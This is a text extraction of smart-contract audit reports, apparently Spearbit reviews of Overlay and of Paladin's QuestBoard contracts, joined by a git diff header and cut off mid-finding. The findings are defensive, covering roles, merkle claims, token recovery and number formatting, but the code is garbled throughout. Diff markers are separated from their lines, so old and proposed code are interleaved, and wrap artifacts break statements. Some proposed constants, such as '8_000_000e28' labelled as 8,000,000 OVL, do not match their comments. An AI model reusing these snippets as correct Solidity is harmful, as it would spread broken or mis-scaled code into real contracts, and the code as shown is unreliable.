AccessControl.sol#L57 OverlayV1Factory.sol#L117, OverlayV1Factory.sol#L156-L157, IOverlayV1Token.sol#L9-L15, Description: Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE, BURNER_ROLE are retrieved via an external function call. To save gas they could also be retrieved as constants via import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol, which is the same as DEFAULT_ADMIN_- ROLE of AccessControl.sol. This ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE. modifier onlyGovernor() { - + require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), "OVLV1: !governor"); require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), "OVLV1: !governor"); _; } ... function deployMarket(...) { ... ovl.grantRole(ovl.MINTER_ROLE(), market_); ovl.grantRole(MINTER_ROLE, market_); ovl.grantRole(ovl.BURNER_ROLE(), market_); ovl.grantRole(BURNER_ROLE, market_); ... - + - + } Recommendation: Consider doing the following changes: IOverlayV1Token.sol +//Note: has to be outside the interface definition +//Can use DEFAULT_ADMIN_ROLE from AccessControl.sol +bytes32 constant MINTER_ROLE = keccak256("MINTER"); +bytes32 constant BURNER_ROLE = keccak256("BURNER"); +bytes32 constant GOVERNOR_ROLE = keccak256("GOVERNOR"); interface IOverlayV1Token is IAccessControlEnumerable, IERC20 { -function ADMIN_ROLE() external view returns (bytes32); -function MINTER_ROLE() external view returns (bytes32); -function BURNER_ROLE() external view returns (bytes32); -function GOVERNOR_ROLE() external view returns (bytes32); } OverlayV1Token.sol 19 - - - - - + - + - + - + bytes32 public constant ADMIN_ROLE = 0x00; bytes32 public constant MINTER_ROLE = keccak256("MINTER"); bytes32 public constant BURNER_ROLE = keccak256("BURNER"); bytes32 public constant GOVERNOR_ROLE = keccak256("GOVERNOR"); constructor() { _setupRole(ADMIN_ROLE, msg.sender); _setupRole(DEFAULT_ADMIN_ROLE , msg.sender); ... _setRoleAdmin(MINTER_ROLE, ADMIN_ROLE); _setRoleAdmin(MINTER_ROLE, DEFAULT_ADMIN_ROLE); _setRoleAdmin(BURNER_ROLE, ADMIN_ROLE); _setRoleAdmin(BURNER_ROLE, DEFAULT_ADMIN_ROLE); _setRoleAdmin(GOVERNOR_ROLE, ADMIN_ROLE); _setRoleAdmin(GOVERNOR_ROLE, DEFAULT_ADMIN_ROLE); } Overlay: Fixed in commit fa0f15c. Spearbit: Acknowledged. 5.5 Informational +5.5.1 Double check action when snapAccumulator == 0 in transform() Severity: Informational Context: Roller.sol#L23-L78 Description: The function transform() does a check for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0) A comment shows this is to prevent division by 0 later on. The division is based on abs(snapAccumulator) + abs(value). So this will only fail when snapAccumulator == value == 0. function transform(...) ... { ... int256 accumulatorNow = snapAccumulator + value; if (accumulatorNow == 0) { // if accumulator now is zero, windowNow is simply window // to avoid 0/0 case below return ... ---> this comment might not be accurate } ... uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator) uint256 w2 = uint256(value >= 0 ? value : -value); uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0 ... // w2 = abs(value) ,! ,! } Recommendation: Double check windowNow should indeed be reset to window when accumulatorNow == 0. Note: this seems logical, but isn’t explicitly stated in the whitepaper. We recommend updating the comment. Overlay: Fixed in 1ea0df. Spearbit: Acknowledged. 20 +5.5.2 Add unchecked in natural log (ln) function or remove the functions Severity: Informational Context: LogExpMath.sol#L297-L334 Description: The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked } Recommendation: Consider removing unused functions. Otherwise, consider adding unchecked to function ln() to make it equivalent to all the other functions. Overlay: Fixed in commit 57b9bd6. Spearbit: Acknowledged. +5.5.3 Specialized functions for the long and short side Severity: Informational Context: OverlayV1Market.sol#L145-L427 Description: The functions build(), unwind() and liquidate() contain a large percentage of code that is differ- ent for the long and short side. Recommendation: Consider creating specialized functions for the long and short side, which might make the code easier to read. Overlay: Did not implement this, due to contract size issues. Spearbit: Acknowledged. +5.5.4 Beware of chain dependencies Severity: Informational Context: OverlayV1Market.sol#L25, OverlayV1UniswapV3Feed.sol#L14 Description: The contracts have a few dependencies/assumptions which aren’t future proof and/or limit on which chain the code can be deployed. The AVERAGE_BLOCK_TIME is different on several EVM based chains. As the the Ethereum mainchain, the AVER- AGE_BLOCK_TIME will change to 12 seconds after the merge. contract OverlayV1Market is IOverlayV1Market { ... uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof ... } WETH addresses are not the same on different chains. See Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH. 21 contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; ... } Recommendation: Consider making the block time a configurable parameter, which is initially set via the con- structor of OverlayV1Market. Additionally, consider supplying the WETH address as a parameter to the constructor of OverlayV1UniswapV3Feed.sol Overlay: Fixed AVERAGE_BLOCK_TIME to be a params[] element in 2bb8552. Will tackle WETH hard code in feed flattening rewrite. Spearbit: Acknowledged. +5.5.5 Move _registerMint() closer to mint() and burn() Severity: Informational Context: OverlayV1Market.sol#L240-L427 Description: Within functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However these two are quite a few lines apart so it is not immediately obvious they are related and operate on the same values. Additionally _registerMint() also registers burns. function unwind(...) ... { ... _registerMint(int256(value) - int256(cost)); ... // 40 lines of code if (value >= cost) { ovl.mint(address(this), value - cost); } else { ovl.burn(cost - value); } ... } function liquidate(address owner, uint256 positionId) external { ... _registerMint(int256(value) - int256(cost)); ... // 33 lines of code ovl.burn(cost - value); ... } Recommendation: Rename _registerMint() to _registerMintAndBurn(). Add a comment to _register- MintAndBurn() on indicate that a negative value means burn. Move the call to _registerMint() close to the ovl.mint() and ovl.burn() calls in the source. Or possibly move the calls of ovl.mint() and ovl.burn() to _registerMint(), which lower the change on mistakes. Nevertheless and as indicated by the Overlay team, this changes could make the code harder to understand. Overlay: Fixed in commit 4894368. Spearbit: Acknowledged. 22 +5.5.6 Use of Math.min() is error-prone Severity: Informational Context: OverlayV1Market.sol, Position.sol Description: Function Math.min() is used in two ways: • To get the smallest of two values, e.g. x = Math.min(x,y); • To make sure the resulting value is >=0, e.g. x -= Math.min(x,y); (note, there is an extra - in -= ) It is easy to make a mistake because both constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values: OverlayV1Market.sol: tradingFee OverlayV1Market.sol: cap OverlayV1Market.sol: cap = Math.min(tradingFee, value); = Math.min(cap, circuitBreaker(snapshot, cap)); = Math.min(cap, backRunBound(data)); Examples to make sure the resulting value is >=0: OverlayV1Market.sol: oiLong -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares OverlayV1Market.sol: pos.notional OverlayV1Market.sol: pos.debt OverlayV1Market.sol: pos.oiShares OverlayV1Market.sol: oiLong oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares Position.sol: posCost -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= uint120( Math.min(pos.notional, pos.notionalInitial(fraction))); -= uint120( Math.min(pos.debt, pos.debtCurrent(fraction))); -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= Math.min(posCost, posDebt); Recommendation: Consider using the following: function minfloor(uint256 a, uint256 b) internal pure returns (uint256) { return a > b ? a - b : 0; } Then you can do something like the example below. This also makes the code easier to read. -oiLong -= Math.min(oiLong, ... ) +oiLong = minfloor(oiLong, ... ) Overlay: Fixed in commit ad4d1ec. Spearbit: Acknowledged. 23 +5.5.7 Confusing use of term burn Severity: Informational Context: OverlayV1Market.sol#L510-L533 Description: The function oiAfterFunding() contains a comment that it burns a portion of the contracts. The term burn can be confused with burning of OVL. The Overlay team clarified that: The total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding. There’s no actual burning of OVL. function oiAfterFunding(...) ... { ... // Burn portion of all aggregate contracts (i.e. oiLong + oiShort) // to compensate protocol for pro-rata share of imbalance liability ... return (oiOverweightNow, oiUnderweightNow); } Recommendation: Update the comments. Overlay: Fixed in commit dae3b82. Spearbit: Acknowledged. +5.5.8 Document precondition for oiAfterFunding() Severity: Informational Context: OverlayV1Market.sol#L488-L494 Description: Function oiAfterFunding contains the following statement: uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; Nevertheless, if oiOverweightBefore < oiUnderweightBefore then statement will revert. Luckily, the update() function makes sure this isn’t the case. function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... { ... uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // Could if oiOverweightBefore < oiUnderweightBefore ... } function update() public returns (Oracle.Data memory) { ... bool isLongOverweight = oiLong > oiShort; uint256 oiOverweight two uint256 oiUnderweight = isLongOverweight ? oiShort : the two (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...); ... = isLongOverweight ? oiLong : oiShort; // oiOverweight is the largest of the oiLong; // oiUnderweight is the smallest of ,! ,! } Recommendation: Document the precondition for function oiAfterFunding(), e.g, the value of oiOverweight- Before must be >= than oiUnderweightBefore. Overlay: Fixed in commit 95e92fe. Spearbit: Acknowledged. 24 +5.5.9 Format numbers intelligibly Severity: Informational Context: OverlayV1Factory.sol#L15-L42 Description: Solidity offers several possibilities to format numbers in a more readable way as noted below. Recommendation: Consider formatting numbers as follows: OverlayV1Factory.sol: + // Note: 1 bps = 1e14 -uint256 public constant MIN_LMBDA = 1e16; // 0.01 +uint256 public constant MIN_LMBDA = 0.01e18; // 0.01 -uint256 public constant MAX_LMBDA = 1e19; // 10 +uint256 public constant MAX_LMBDA = 10e18; // 10 // 2% (200 bps) -uint256 public constant MAX_DELTA = 2e16; +uint256 public constant MAX_DELTA = 200e14; // 2% (200 bps) -uint256 public constant MAX_CAP_PAYOFF = 1e19; // 10x +uint256 public constant MAX_CAP_PAYOFF = 10e18; // 10x -uint256 public constant MAX_CAP_NOTIONAL = 8e24; // 8,000,000 OVL (initial supply) +uint256 public constant MAX_CAP_NOTIONAL = 8_000_000e18; // 8,000,000 OVL (initial supply) // 20x -uint256 public constant MAX_CAP_LEVERAGE = 2e19; +uint256 public constant MAX_CAP_LEVERAGE = 20e18; // 20x -uint256 public constant MAX_CIRCUIT_BREAKER_MINT_TARGET = 8e24; // 8,000,000 OVL +uint256 public constant MAX_CIRCUIT_BREAKER_MINT_TARGET = 8_000_000e28; // 8,000,000 OVL -uint256 public constant MIN_MAINTENANCE_MARGIN_FRACTION = 1e16; // 1% +uint256 public constant MIN_MAINTENANCE_MARGIN_FRACTION = 0.01e18; // 1% // 20% -uint256 public constant MAX_MAINTENANCE_MARGIN_FRACTION = 2e17; +uint256 public constant MAX_MAINTENANCE_MARGIN_FRACTION = 0.20e18; // 20% -uint256 public constant MIN_MAINTENANCE_MARGIN_BURN_RATE = 1e16; // 1% +uint256 public constant MIN_MAINTENANCE_MARGIN_BURN_RATE = 0.01e18; // 1% -uint256 public constant MAX_MAINTENANCE_MARGIN_BURN_RATE = 5e17; +uint256 public constant MAX_MAINTENANCE_MARGIN_BURN_RATE = 0.50e18; // 50% // 50% // 0.10% (10 bps) -uint256 public constant MIN_LIQUIDATION_FEE_RATE = 1e15; +uint256 public constant MIN_LIQUIDATION_FEE_RATE = 10e14; // 0.10% (10 bps) -uint256 public constant MAX_LIQUIDATION_FEE_RATE = 1e17; // 10.00% (1000 bps) +uint256 public constant MAX_LIQUIDATION_FEE_RATE = 1_000e14; // 10.00% (1000 bps) -uint256 public constant MAX_TRADING_FEE_RATE = 3e15; // 0.30% (30 bps) +uint256 public constant MAX_TRADING_FEE_RATE = 30e14; // 0.30% (30 bps) -uint256 public constant MIN_MINIMUM_COLLATERAL = 1e12; // 1e-6 OVL +uint256 public constant MIN_MINIMUM_COLLATERAL = 0.000_000_1e18; // 1e-6 OVL -uint256 public constant MIN_PRICE_DRIFT_UPPER_LIMIT = 1e12; // 0.01 bps/s +uint256 public constant MIN_PRICE_DRIFT_UPPER_LIMIT = 0.01e14; // 0.01 bps/s Overlay: Fixed in commit a82ddd7. Spearbit: Acknowledged. 25 diff --git a/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt new file mode 100644 index 0000000..86b8016 --- /dev/null +++ b/findings_newupdate/spearbit/Paladin-Spearbit-Security-Review.txt @@ -0,0 +1,48 @@ +5.1.1 Verify user has indeed voted Severity: High Risk Context: MultiMerkleDistributor.sol Description: If an error is made in the merkle trees (either by accident or on purpose) a user that did not vote (in that period for that gauge) might get rewards assigned to him. Although the Paladin documentation says: "the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high. Recommendation: Check that a user has voted by interrogating the gauge contracts at reward retrieval time. Paladin: We carefully considered this issue along the development cycle and the main argument against the recommendation is as follows: If users want to pile up rewards in order to claim them all at once (e.g. because of gas fees), then the only vote we can fetch from the Curve Gauge Controller is the last vote from the user since the previous ones were removed, and no checkpoints of past votes exists in the Gauge Controller. That would mean user past claims would be locked, and never claimed. Because of that, we are trying to have the most trustworthy MerkleTree generation, so this type of issue does not appear. Spearbit: Acknowledged, recommendation not implemented therefore risk still exists. +5.1.2 Tokens could be sent / withdrawn multiple times by accident Severity: High Risk Context: QuestBoard.sol#L678-L815 Description: Functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but in- terfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the periods, as closeQuestPeriod() checks the state of the first quest. 2. Suppose you have closed the second quest of a period via closePartOfQuestPeriod(), but closeQuest- Period() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor, again. Also, function closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues with future code changes. 5 function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... // We use the 1st QuestPeriod of this period to check it was not Closed uint256[] memory questsForPeriod = questsByPeriod[period]; require( ,! periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period "QuestBoard: Period already closed" ); ... // no further checks on currentState _questPeriod.withdrawableAmount = .... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again) ... } // sets withdrawableAmount (again) function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ,! ... _questPeriod.currentState = PeriodState.CLOSED; ... _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount; IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); ... } Note: Set to high risk because the likelihood of this happening is medium, but the impact is high. Recommendation: closePartOfQuestPeriod() more robust by: function Let closeQuestPeriod() call closePartOfQuestPeriod(). Make • Checking the status of each period. • Skipping the already closed periods. Paladin: Implemented in #9. Spearbit: Acknowledged. 5.2 Medium Risk +5.2.1 Limit possibilities of recoverERC20() Severity: Medium Risk Context: MultiMerkleDistributor.sol#L296-L300, QuestBoard.sol#L986-L991 Description: Function recoverERC20() in contract MultiMerkleDistributor.sol allows the retrieval of all ERC20 tokens from the MultiMerkleDistributor.sol whereas the comment indicates it is only meant to retrieve those tokens that have been sent by mistake. Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], "QuestBoard: Cannot recover whitelisted token"); IERC20(token).safeTransfer(owner(), amount); return true; } } Recommendation: Prevent the retrieval of legitimate tokens. Because it is not possible to enumerate questRe- wardToken[] to identify legitimate tokens, an extra data structure is needed. Also be aware of dual entry point tokens. Paladin: Implemented in #16. Spearbit: Acknowledged. +5.2.2 Updating QuestBoard in MultiMerkleDistributor.sol will not work Severity: Medium Risk Context: MultiMerkleDistributor.sol#L285-L287 Description: Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; } Recommendation: Confirm the usefulness of updating the QuestManager/ QuestBoard. relevant, adapt QuestBoard.sol to start with a higher value for nextID. If this functionality is Paladin: The QuestBoard should be unique (only replaced if the GaugeController is replaced or in case of a bug requiring to kill the contract), while the Distributor could be replaced to propose new ways to redeem the reward tokens. QuestBoard is now immutable, therefore this method is not needed anymore. Implemented in #16. Spearbit: Acknowledged. 7 +5.2.3 Old quests can be extended via increaseQuestDuration() Severity: Medium Risk Context: QuestBoard.sol#L380-L438 Description: Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... } Recommendation: Determine what the actions should be when the quest is in the past. Paladin: We check that when calling the function, the current period is either the last period of the Quest, or before that last period. If not, the Quest is over, and we revert. Implemented in #8. Spearbit: Acknowledged. +5.2.4 Accidental call of addQuest could block contracts Severity: Medium Risk Context: MultiMerkleDistributor.sol#L240, QuestBoard.sol#L276-L369 Description: The addQuest() function uses an onlyAllowed access control modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), "QuestBoard: Fail add to Distributor"); ... ,! } 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), "MultiMerkle: Quest already listed"); require(token != address(0), "MultiMerkle: Incorrect reward token"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: Replace the modifier on addQuest() to a modifier like onlyQuestBoard(): modifier onlyQuestBoard(){ require(msg.sender == questBoard, "MultiMerkle: Not allowed"); _; } Paladin: Choice to put only a require instead of a 1 time use modifier. Implemented in #5. Spearbit: Acknowledged. +5.2.5 Reduce impact of emergencyUpdatequestPeriod() Severity: Medium Risk Context: MultiMerkleDistributor.sol#L311-L322 Description: Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: • Someone who has already claimed might be able to claim again. • Someone who has already claimed has too much. • Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. • someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: The following steps can be taken to reduce the impact: • Only allow an update if no claims have been done yet, by checking no bits have been set yet. However this has limited use. 9 • Make sure the index number of a user always stays the same, although this doesn’t help if the user is entitled to an higher amount. • Exclude already claimed tokens from the new merkle tree. To prevent claiming in the mean time, it might be a good idea to pause the claiming to make sure no claims are done in the mean time. Reset all the bits after the update. • Consider storing how much each account has claimed and allow the account to claim less on future claims, in case the account has claimed too much. However this requires some complicated logic. Note: The contract needs to store the size of the merkle tree (e.g. the largest index) to be able to check/reset all the bits. Paladin: In the case where a new amount of token is transferred to the contract to cover losses from wrong calculated claims, we might need to change that amount to allow them to claim. Added a parameter addedRewards to increase questRewardsPerPeriod, but never decrease it. Implemented in #16. Explanation for the emergency update procedure: 1. Block claims for the Quest period by using this method to set an incorrect MerkleRoot, where no proof matches the root. 2. Prepare a new Merkle Tree, taking into account previous user claims on that period and missing/overpaid rewards. a) For all new claims to be added, set them after the last index of the previous Merkle Tree. b) For users that did not claim, keep the same index and adjust the amount to be claimed if needed. c) For indexes that were claimed, place an empty node in the Merkle Tree (with an amount at 0 & the address 0xdead as the account). 3. Update the Quest period with the correct MerkleRoot (no need to change the Bitmap, as the new MerkleTree will account for the indexes already claimed). Spearbit: Acknowledged. Implemented in part technically and procedurally. +5.2.6 Verify the correct merkle tree is used Severity: Medium Risk Context: MultiMerkleDistributor.sol#L260-L275, balance-tree.ts#L30-L35, MultiMerkleDistributor.sol#L126-L144 Description: The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: A solution which does not cost any extra storage but requires a small amount of gas involves adding questid and period into the merkle tree nodes, assuring rewards can only be claimed in combination with the right questid and period. balance-tree.ts: // keccak256(abi.encode(index, account, amount)) public static toNode(index: number | BigNumber, account: string, amount: BigNumber): Buffer { return Buffer.from( utils.solidityKeccak256(['uint256', 'address', 'uint256'], [index, account, amount]).substr(2), utils.solidityKeccak256(['uint256', 'uint256', 'uint256', 'address', 'uint256'], [ questID, period, index, account, amount]).substr(2), 'hex' ) - + + } 10 MultiMerkleDistributor.sol: function claim(uint256 questID, uint256 period, uint256 index, address account, uint256 amount, ...) public { ... // Check that the given parameters match the given Proof bytes32 node = keccak256(abi.encodePacked(index, account, amount)); bytes32 node = keccak256(abi.encodePacked(questID, period, index, account, amount)); ... ,! - + } Paladin: Implemented in #12. Spearbit: Acknowledged. +5.2.7 Prevent mixing rewards from different quests and periods Severity: Medium Risk Context: MultiMerkleDistributor.sol#L260-L275 Description: The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree are equal to the rewards allocated for that quest and for that period. This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will give problems later on, when claims are done for the other quest/periods. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high. Recommendation: Consider making token buckets per quest (or even per period) in the MultiMerkleDistribu- tor contract. Paladin: Implemented in #16. Spearbit: Acknowledged. 5.3 Low Risk +5.3.1 Nonexistent zero address check for newQuestBoard in updateQuestManager function Severity: Low Risk Context: MultiMerkleDistributor.sol#L285-L287 Description: Nonexistent zero address check for newQuestBoard in updateQuestManager function. Assigning newQuestBoard to a zero address may cause unintended behavior. Recommendation: Introduce a check for a 0x addresss. function updateQuestManager(address newQuestBoard) external onlyOwner { + require(newQuestBoard != address(0), "newQuestBoard: Zero Address"); questBoard = newQuestBoard; } Paladin: Implemented in #16. Spearbit: Acknowledged. 11 +5.3.2 Verify period is always a multiple of week Severity: Low Risk QuestBoard.sol#L201-L203, QuestBoard.sol#L750-L815, Context: QuestBoard.sol#L843-L845, MultiMerkleDistributor.sol#L126-L144, MultiMerkleDistributor.sol#L185-L216, MultiMerkleDistributor.sol#L260-L275, MultiMerkleDistributor.sol#L311- L322 QuestBoard.sol#L678-L742, QuestBoard.sol#L854-L863, Description: The calculations with period assume that period is a multiple of WEEK. However, period is often assigned as a parameter and not verified if it is a multiple of WEEK. This calculation may cause unexpected results. Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified: - int256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; + int256 nextPeriod = period + WEEK; The following function does not explicitly verify that period is a multiple of WEEK. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; ... } function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... } function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... } ,! function claim(..., uint256 period, ...) public { ... } function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external { ,! ... // also uses period as part of the claims array require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, "MultiMerkle: not updated yet"); require(!isClaimed(questID, claims[i].period, claims[i].index), "MultiMerkle: already claimed"); ... require( MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], ,! node), "MultiMerkle: Invalid proof" ); ... _setClaimed(questID, claims[i].period, claims[i].index); ... emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account); ... } Recommendation: Consider assuing that period is a multiple of WEEK. This can be achieved in the following way: uint256 period = (period / WEEK) * WEEK; If this is done everywhere then consider making this change: - ((period + WEEK) / WEEK) * WEEK; + period + WEEK; Paladin: Implemented in #13. Changes not made for the claim methods, as this type of issue where period is incorrect will be handled by changes made in #7. 12 Spearbit: Acknowledged. +5.3.3 Missing safety check to ensure array length does not underflow and revert Severity: Low Risk Context: QuestBoard.sol#L515-L574 QuestBoard.sol#L235-L242, QuestBoard.sol#L380-L438, QuestBoard.sol#L448-L505, Description: Several functions use questPeriods[questID][questPeriods[questID].length - 1]. The sec- ond value in the questPeriods mapping is questPeriods[questID].length - 1. It is possible for this function to revert if the case arises where questPeriods[questID].length is 0. Looking at the code this is not likely to occur but it is a valid safety check that covers possible strange edge cases. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestObjective(... ) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } Recommendation: Add a require to check the length of questPeriods[questID]: + require(questPeriods[questID].length > 0, "Array Underflow"); uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; Paladin: Implemented in #8. Spearbit: Acknowledged. +5.3.4 Prevent dual entry point tokens Severity: Low Risk Context: QuestBoard.sol#L986-L991 Description: Function recoverERC20() in contract QuestBoard.sol only allows the retrieval of non whitelisted tokens. Recently an issue has been found to circumvent these checks, with so called dual entry point tokens. See a description here: compound-tusd-integration-issue-retrospective function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], "QuestBoard: Cannot recover whitelisted token"); IERC20(token).safeTransfer(owner(), amount); return true; } 13 Recommendation: Make sure dual entry point tokens are not whitelisted in the protocol. Paladin: It is noted in our methodology to check if an ERC20 can be whitelisted as a reward token in the protocol to avoid this type of issue. Spearbit: Acknowledged. +5.3.5 Limit the creation of quests Severity: Low Risk Context: QuestBoard.sol#L201-L203, QuestBoard.sol#L276-L369, QuestBoard.sol#L870-L879 Description: The function getQuestIdsForPeriod() could run out of gas if someone creates an enormous amount of quests. See also: what-is-the-array-size-limit-of-a-returned-array. Note: If this were to happen, the QuestIds can also be retrieved directly from the getter of questsByPeriod(). Note: closeQuestPeriod() has the same problem, but closePartOfQuestPeriod() is a workaround for this. Requiring a minimal amount of tokens to create a quest can limit the number of quests. The minimum number of tokens to pay is: duration * minObjective * minRewardPerVotePerToken[]. The values of duration and minObjective are 